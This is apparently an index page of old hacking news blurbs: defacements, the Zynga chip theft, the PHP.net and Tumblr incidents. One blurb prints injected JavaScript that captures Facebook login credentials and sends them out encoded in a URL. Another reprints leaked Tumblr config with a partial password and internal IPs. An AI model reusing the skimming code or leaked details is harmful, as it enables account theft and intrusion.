The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Bsnl India Helpdesk Admin panel Hacked ! Here in above pic a Indian Hackers Group " The Blackroot " Access to the Admin panel of Bsnl India Help-desk. Lol , Nothing is Secure, technical support by Bsnl also have Technical Problems ;-) News Source : Facebook 

Indonesian Soccer Association (PSSI) website hijacked by hackers ! Hackers apparently hijacked the website of the Indonesian Soccer Association (PSSI), placing an anti-corruption message on the PSSI's homepage. The homepage currently displays a mouse holding two smoking pistol and carries the message " Stop Corruption and Bribery in Indonesia. " The hackers claimed to be members of a group named" Fried Worker Activists Caring for Indonesia ".

Zynga hacker, Ashley Mitchell jailed for two years ! British bloke Ashley Mitchell, 29, has been jailed for two years after stealing some 400 billion virtual gaming chips gaming company Zynga. Mitchell hacked his way into Zynga's back-end systems by pinching the identities of two Zynga employees and filleted the swag, some of which he managed to flog on Facebook and some he used to gamble his nights away playing online poker. Mitchell, of Paignton, Devon pleaded guilty to hacking the servers and pinching the chips, which were estimated to be worth around £7.4 million in real money. He flogged around a third of his ill-gotten gains for £53,612. James Taghdissian, prosecuting, told the court that Zynga realised in August 2009 that its chips were disappearing and suspicion fell on two employees. It turned out that Mitchell was using their details to gain access to the stash. Mitchell had been using his neighbours' Wi-Fi connections to carry out his hacks, which lead to t...

While phishing and ransomware dominate headlines, another critical risk quietly persists across most enterprises: exposed Git repositories leaking sensitive data. A risk that silently creates shadow access into core systems Git is the backbone of modern software development, hosting millions of repositories and serving thousands of organizations worldwide. Yet, amid the daily hustle of shipping code, developers may inadvertently leave behind API keys, tokens, or passwords in configuration files and code files, effectively handing attackers the keys to the kingdom. This isn't just about poor hygiene; it's a systemic and growing supply chain risk. As cyber threats become more sophisticated, so do compliance requirements. Security frameworks like NIS2, SOC2, and ISO 27001 now demand proof that software delivery pipelines are hardened and third-party risk is controlled. The message is clear: securing your Git repositories is no longer optional, it's essential. Below, we look at the ris...

1337hax & Windowsforums hacked by Team - Indishell ! Hacked sites : https://1337hax.org/ https://www.zone-h.net/mirror/id/13288096 https://windowsforums.org/ https://www.zone-h.net/mirror/id/13288104

Tumblr security flaw , Clarification by Tumblr official staff ! On our yesterday post about  Tumblr security flaw : server IPS, API keys, passwords, etc were leaked , Finally Tumblr official staff gives a statement to all their users as below : A human error caused some sensitive server configuration information to be exposed this morning. Our technicians took immediate measures to protect from any issues that may come as a result. We're triple checking everything and bringing in outside auditors to confirm, but we have no reason to believe that anything was compromised.  We're certain that none of your personal information (passwords, etc.) was exposed, and your blog is backed up and safe as always.  This was an embarrassing error, but something we were prepared for. The fact that this occurred at all is still unacceptable, and we'll be seriously evaluating and adjusting our processes to ensure an error like this can never happen again. ...

The PHP Group has confirmed the compromise of their server ! In our last post we post that, Php.net got Compromised , Read here  . Today finaly PHP group has announce that they was really got hacked,as shown in above image. Link :  https://www.php.net/archive/2011.php#id2011-03-19-2

3 websites hacked By Rao Assasin Hacker ! Hacked sites :  https://www.zooguiden.com/index.html https://www.ridleder.com/index.html https://www.bcwater.gov.cn/index.html News Source : Rao Assasin Hacker

Paki UrduHack Security Team Is No More ! The UrduHack Team Said This: I HAVE FINALLY DECIDED TO SHUTDOWN THIS SITE AND PAKI URDUHACK SECURITY TEAM FOREVER. FROM THIS MOMENT FORWARD,URDUHACK TEAM IS NO MORE,IT'S BEEN A WONDERFULL JOURNEY. DUE TO PERSONAL LIFE MATTER'S I DECIDED TO SHUTDOWN URDUHACK SECURITY TEAM.IF ANYONE USE OUR NAME OR ANYTHING ,I AM NOT RESPONSIBLE FOR HIS ACTIONS.I STARTED THIS TEAM 4 YEARS AGO ALONE BY MYSELF,DURING MY JOURNEY I MET WITH GREAT GOOD PEOPLES AND SOME BAD ONES ALSO.I DEDICATED ALL MY WORK TO MY LATE BROTHER CODE-5 ,WHO IS NO LONGER WITH ME,HE WILL BE ALWAYS REMEMBERED IN MY HEART.I WOULD LIKE TO THANK MY DEAREST FRIEND SHOZY,WHO SUPPORTED ME IN SO MANY WAYS,I CANNOT DEFINE IN WORDS.THE CONTROL OF THIS DOMAIN WILL BE IN ARSLAN HAND, HE OWN THIS DOMAIN NAME AND EVERYTHING RELATED HOST AND EVERYTHING,IF I EVER HURT ANYONE FOR THAT I AM REALLY SORRY,PLEASE FORGIVE ME. A MESSAGE FOR NEW YOUNGSTERS FROM PAKISTAN. PLEASE PLEASE PLEASE DON'T W...

40 websites defaced by A42 & skywalk3r (Team Greyhat) Hacked sites list :  https://pastebin.com/HUNLSXcQ News Source : A42 & skywalk3r (Team Greyhat)

You perhaps have followed the recent actualities about Tunisian Government stealing accounts on facebook. Read More Here ... There's how they do: Here's the web page of Facebook as seen when you're connected in Tunisia https://pastebin.com/WV0C9t0F Let's take a look at that javascript curious part.. !-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "https://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else...

Update : Tumblr security flaw, Clarification by Tumblr official staff ! : The Hacker News ~ https://www.thehackernews.com/2011/03/tumblr-security-flaw-clarification-by.html There is a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. There are some of the stuff that got disclosed: Database::set_defaults(array(  'user' => 'tumblr3′, 'password' => 'm3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′,  .. define('MEMCACHE_HOST', '10.252.0.68′); define('MEMCACHE_VERSION_HOST', ' 10.252.0.67 '); Database::add('primary', array('host' =>  '192.168.200.142 ')); .. We redacted a bit to protect the innocent, but anyone can find it on Google. So what is going on? Did they got hacked somehow? We don't think so… By looking at the disclosed data dump, it looks like one of their developers make a little mistake: i?php require_once('chorus/Utils.php'); Can you see it above? Instead of starting ...

The latest Web app attacks and countermeasures from world-renowned practitioners. Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource. Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation Understand how attackers defeat commonly used Web authe...